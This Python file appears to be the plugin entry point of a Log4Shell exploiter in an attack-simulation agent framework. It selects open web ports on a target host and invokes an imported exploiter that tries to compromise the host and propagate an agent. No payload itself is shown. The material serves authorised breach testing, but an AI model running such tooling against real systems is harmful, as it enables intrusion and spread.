import logging
from pprint import pformat
from typing import Any, Dict, List, Set

from agentpluginapi import (
    ExploiterResult,
    IAgentCommandBuilderFactory,
    IAgentEventPublisher,
    IHTTPAgentBinaryServerRegistrar,
    ITCPPortSelector,
    LocalMachineInfo,
    TargetHost,
)
from monkeytypes import AgentID, Event, NetworkPort, NetworkService

from .log4shell_exploit_client import Log4ShellExploitClient
from .log4shell_exploiter import Log4ShellExploiter
from .log4shell_options import Log4ShellOptions

logger = logging.getLogger(__name__)


def get_ports_to_try(
    host: TargetHost, target_ports: List[NetworkPort], try_all_discovered_http_ports: bool
) -> Set[NetworkPort]:
    tcp_ports = host.ports_status.tcp_ports
    ports_to_try = set(target_ports) - tcp_ports.closed
    if try_all_discovered_http_ports:
        ports_to_try.update(tcp_ports.get_open_service_ports(NetworkService.HTTP))

    return ports_to_try


def should_attempt_exploit(ports_to_try: Set[NetworkPort]) -> bool:
    return bool(ports_to_try)


class Plugin:
    def __init__(
        self,
        *,
        plugin_name: str,
        agent_id: AgentID,
        agent_event_publisher: IAgentEventPublisher,
        http_agent_binary_server_registrar: IHTTPAgentBinaryServerRegistrar,
        tcp_port_selector: ITCPPortSelector,
        local_machine_info: LocalMachineInfo,
        agent_command_builder_factory: IAgentCommandBuilderFactory,
        **kwargs,
    ):
        log4shell_exploit_client = Log4ShellExploitClient(
            plugin_name, agent_id, agent_event_publisher
        )

        self._log4shell_exploiter = Log4ShellExploiter(
            agent_id=agent_id,
            log4shell_exploit_client=log4shell_exploit_client,
            tcp_port_selector=tcp_port_selector,
            http_agent_binary_server_registrar=http_agent_binary_server_registrar,
            agent_command_builder_factory=agent_command_builder_factory,
        )

        self._local_machine_info = local_machine_info

    def run(
        self,
        *,
        host: TargetHost,
        options: Dict[str, Any],
        interrupt: Event,
        **kwargs,
    ) -> ExploiterResult:
        try:
            logger.debug(f"Parsing options: {pformat(options)}")
            log4shell_options = Log4ShellOptions(**options)
        except Exception as err:
            msg = f"Failed to parse Log4Shell options: {err}"
            logger.exception(msg)
            return ExploiterResult(error_message=msg)

        self._ports_to_try = get_ports_to_try(
            host, log4shell_options.target_ports, log4shell_options.try_all_discovered_http_ports
        )
        if not should_attempt_exploit(self._ports_to_try):
            msg = f"Could not find any open web ports to exploit on host {host.ip}"
            logger.debug(msg)
            return ExploiterResult(
                exploitation_success=False, propagation_success=False, error_message=msg
            )

        try:
            logger.debug(f"Running Log4Shell exploiter on host {host.ip}")
            return self._log4shell_exploiter.exploit_host(
                target_host=host,
                ports_to_try=self._ports_to_try,
                options=log4shell_options,
                local_machine_info=self._local_machine_info,
                interrupt=interrupt,
            )
        except Exception as err:
            msg = f"An unexpected exception occurred while attempting to exploit host: {err}"
            logger.exception(msg)
            return ExploiterResult(error_message=msg)
